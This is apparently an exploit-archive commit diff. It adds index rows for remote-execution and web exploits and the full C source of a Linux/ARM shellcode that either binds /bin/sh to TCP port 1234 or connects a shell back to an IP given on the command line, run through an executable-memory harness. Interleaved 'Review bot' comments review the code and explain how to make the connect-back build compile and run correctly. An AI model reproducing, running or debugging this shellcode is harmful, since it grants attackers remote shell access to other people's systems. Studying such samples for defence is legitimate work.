5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16618,7 +16621,7 @@ id,file,description,date,author,type,platform,port
45018,exploits/java/remote/45018.rb,"Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,java,8181
45019,exploits/linux/remote/45019.rb,"Apache CouchDB - Arbitrary Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,5984
45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80
45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
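Review bot: with the `+`/`-` markers lost in rendering, the two rows for id 45025 read as a duplicate; the hunk header `@ -16618,7 +16621,7 @@` (seven lines in, seven out) and the commit summary's single deletion show this is a one-line rename of the description, and with the usual removed-before-added ordering the surviving title is "Hadoop YARN ResourceManager - Command Execution (Metasploit)". Only one 45025 row should remain in files_exploits.csv; please double-check the file rather than the rendering, because a duplicate id would break the CSV's primary key.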
@ -39657,6 +39660,9 @@ id,file,description,date,author,type,platform,port
45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,
45030,exploits/hardware/webapps/45030.txt,"VelotiSmart WiFi B-380 Camera - Directory Traversal",2018-07-16,"Miguel Mendez Z",webapps,hardware,80
45015,exploits/hardware/webapps/45015.txt,"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities",2018-07-13,"Core Security",webapps,hardware,443
45016,exploits/php/webapps/45016.txt,"Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure",2018-07-13,"SEC Consult",webapps,php,80
45022,exploits/hardware/webapps/45022.txt,"Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery",2018-07-13,t4rkd3vilz,webapps,hardware,
45027,exploits/java/webapps/45027.txt,"Fortify Software Security Center (SSC) 17.x/18.1 - XML External Entity Injection",2018-07-16,alt3kx,webapps,java,
45031,exploits/php/webapps/45031.txt,"WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting",2018-07-16,"Berk Dusunur",webapps,php,
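Review bot: the new row `45030,exploits/hardware/webapps/45030.txt,...` is inserted between 45007 and 45015, breaking the ascending id order that the surrounding rows follow (45002, 45003, 45007, 45015, 45016, 45022, 45027, 45031); move it after 45027 and before 45031. It is also the only one of the new `.txt` rows that fills the `port` column (80); that matches the advisory's `http://domain:80/...` example, but since the other text advisories in this commit leave the port blank, make sure it is deliberate.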


@ -894,3 +894,4 @@ id,file,description,date,author,type,platform
44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm
44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86
45029,shellcodes/arm/45029.c,"Linux/ARM - Bind (1234/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2018-07-16,odzhancode,shellcode,arm


shellcodes/arm/45029.c Normal file

@ -0,0 +1,179 @@
/**
Copyright © 2017 Odzhan. All Rights Reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE. */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#ifndef CONNECT
// bind shell
#define CODE_SIZE 104
char CODE[] = {
/* 0000 */ "\x54\x40\x9f\xe5" /* ldr r4, [pc, #0x54] */
/* 0004 */ "\x54\x50\x9f\xe5" /* ldr r5, [pc, #0x54] */
/* 0008 */ "\x54\x60\x9f\xe5" /* ldr r6, [pc, #0x54] */
/* 000C */ "\x01\x30\x8f\xe2" /* add r3, pc, #1 */
/* 0010 */ "\x13\xff\x2f\xe1" /* bx r3 */
/* 0014 */ "\x52\x40" /* eors r2, r2 */
/* 0016 */ "\x01\x21" /* movs r1, #1 */
/* 0018 */ "\x0f\x02" /* lsls r7, r1, #8 */
/* 001A */ "\x19\x37" /* adds r7, #0x19 */
/* 001C */ "\x02\x20" /* movs r0, #2 */
/* 001E */ "\x01\xdf" /* svc #1 */
/* 0020 */ "\x80\x46" /* mov r8, r0 */
/* 0022 */ "\x21\x1c" /* adds r1, r4, #0 */
/* 0024 */ "\x06\xb4" /* push {r1, r2} */
/* 0026 */ "\x69\x46" /* mov r1, sp */
/* 0028 */ "\x4a\x70" /* strb r2, [r1, #1] */
/* 002A */ "\x10\x22" /* movs r2, #0x10 */
/* 002C */ "\x01\x37" /* adds r7, #1 */
/* 002E */ "\x01\xdf" /* svc #1 */
/* 0030 */ "\x01\x21" /* movs r1, #1 */
/* 0032 */ "\x40\x46" /* mov r0, r8 */
/* 0034 */ "\x02\x37" /* adds r7, #2 */
/* 0036 */ "\x01\xdf" /* svc #1 */
/* 0038 */ "\x52\x40" /* eors r2, r2 */
/* 003A */ "\x49\x40" /* eors r1, r1 */
/* 003C */ "\x40\x46" /* mov r0, r8 */
/* 003E */ "\x01\x37" /* adds r7, #1 */
/* 0040 */ "\x01\xdf" /* svc #1 */
/* 0042 */ "\x80\x46" /* mov r8, r0 */
/* 0044 */ "\x03\x21" /* movs r1, #3 */
/* 0046 */ "\x3f\x27" /* movs r7, #0x3f */
/* 0048 */ "\x40\x46" /* mov r0, r8 */
/* 004A */ "\x01\x39" /* subs r1, #1 */
/* 004C */ "\x01\xdf" /* svc #1 */
/* 004E */ "\xfa\xd1" /* bne #0x46 */
/* 0050 */ "\x17\x1c" /* adds r7, r2, #0 */
/* 0052 */ "\xe0\xb4" /* push {r5, r6, r7} */
/* 0054 */ "\x68\x46" /* mov r0, sp */
/* 0056 */ "\x0b\x27" /* movs r7, #0xb */
/* 0058 */ "\x01\xdf" /* svc #1 */
/* 005A */ "\xc0\x46" /* mov r8, r8 */
/* 005C */ "\x02\xff\x04\xd2" /* AF_INET, 1234 */
/* 0060 */ "\x2f\x62\x69\x6e" /* /bin */
/* 0064 */ "\x2f\x2f\x73\x68" /* //sh */
};
#else
char CODE[] = {
/* 0000 */ "\x44\x30\x9f\xe5" /* ldr r3, [pc, #0x44] */
/* 0004 */ "\x44\x40\x9f\xe5" /* ldr r4, [pc, #0x44] */
/* 0008 */ "\x44\x50\x9f\xe5" /* ldr r5, [pc, #0x44] */
/* 000C */ "\x44\x60\x9f\xe5" /* ldr r6, [pc, #0x44] */
/* 0010 */ "\x01\x00\x8f\xe2" /* add r0, pc, #1 */
/* 0014 */ "\x10\xff\x2f\xe1" /* bx r0 */
/* 0018 */ "\x52\x40" /* eors r2, r2 */
/* 001A */ "\x01\x21" /* movs r1, #1 */
/* 001C */ "\x02\x20" /* movs r0, #2 */
/* 001E */ "\x0f\x02" /* lsls r7, r1, #8 */
/* 0020 */ "\x19\x37" /* adds r7, #0x19 */
/* 0022 */ "\x01\xdf" /* svc #1 */
/* 0024 */ "\x80\x46" /* mov r8, r0 */
/* 0026 */ "\x18\xb4" /* push {r3, r4} */
/* 0028 */ "\x69\x46" /* mov r1, sp */
/* 002A */ "\x4a\x70" /* strb r2, [r1, #1] */
/* 002C */ "\x10\x22" /* movs r2, #0x10 */
/* 002E */ "\x02\x37" /* adds r7, #2 */
/* 0030 */ "\x01\xdf" /* svc #1 */
/* 0032 */ "\x03\x21" /* movs r1, #3 */
/* 0034 */ "\x3f\x27" /* movs r7, #0x3f */
/* 0036 */ "\x40\x46" /* mov r0, r8 */
/* 0038 */ "\x01\x39" /* subs r1, #1 */
/* 003A */ "\x01\xdf" /* svc #1 */
/* 003C */ "\xfa\xd1" /* bne #0x34 */
/* 003E */ "\x52\x40" /* eors r2, r2 */
/* 0040 */ "\x17\x1c" /* adds r7, r2, #0 */
/* 0042 */ "\xe0\xb4" /* push {r5, r6, r7} */
/* 0044 */ "\x68\x46" /* mov r0, sp */
/* 0046 */ "\x0b\x27" /* movs r7, #0xb */
/* 0048 */ "\x01\xdf" /* svc #1 */
/* 004A */ "\xc0\x46" /* mov r8, r8 */
/* 004C */ "\x02\xff\x04\xd2" /* AF_INET, 1234 */
/* 0050 */ "\x7f\x00\x00\x01" /* 127.0.0.1 */
/* 0054 */ "\x2f\x62\x69\x6e" /* /bin */
/* 0058 */ "\x2f\x2f\x73\x68" /* //sh */
};
#define IP_ADDR_OFS 0x50
#endif
// allocate read/write and executable memory
// copy data from code and execute
void exec_code(void *code, size_t code_len, char *ip_str) {
void *bin;
uint8_t *p;
in_addr_t ip;
#ifdef CONNECT
ip=inet_addr(ip_str);
#endif
bin=mmap (0, code_len,
PROT_EXEC | PROT_WRITE | PROT_READ,
MAP_ANON | MAP_PRIVATE, -1, 0);
if (bin!=NULL) {
p=(uint8_t*)bin;
memcpy (p, code, code_len);
#ifdef CONNECT
// copy ip
memcpy ((void*)&p[IP_ADDR_OFS], (void*)&ip, sizeof(ip));
#endif
// execute
((void(*)())bin)();
munmap (bin, code_len);
}
}
int main(int argc, char *argv[]) {
#ifdef CONNECT
if(argc!=2){
printf("usage: test <ip address>\n");
return 0;
}
#endif
exec_code(CODE, CODE_SIZE,argv[1]);
return 0;
}
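Review bot: `CODE_SIZE` is defined only inside the `#ifndef CONNECT` branch (`#define CODE_SIZE 104`), so a build with `-DCONNECT` fails at `exec_code(CODE, CODE_SIZE,argv[1]);` with an undeclared identifier; define it once for both variants, for example `#define CODE_SIZE (sizeof(CODE) - 1)` placed after the `#endif`, which also keeps the count in step with the byte array (104 for the bind variant, 92 for the connect-back variant) and excludes the NUL that the string-literal initializer appends. In `exec_code`, the check `if (bin!=NULL)` is the wrong test for `mmap`, which returns `MAP_FAILED` (`(void *)-1`) rather than `NULL` on failure; as written a failed mapping is treated as success and `((void(*)())bin)();` jumps to an invalid address, so compare against `MAP_FAILED` and report the error instead. Two smaller points: in the default (bind) build `main` passes `argv[1]` through with no `argc` check, which is harmless only because `ip_str` is unused on that path, and the usage message names the binary `test`; returning a non-zero status on the usage path would also be more conventional than `return 0`.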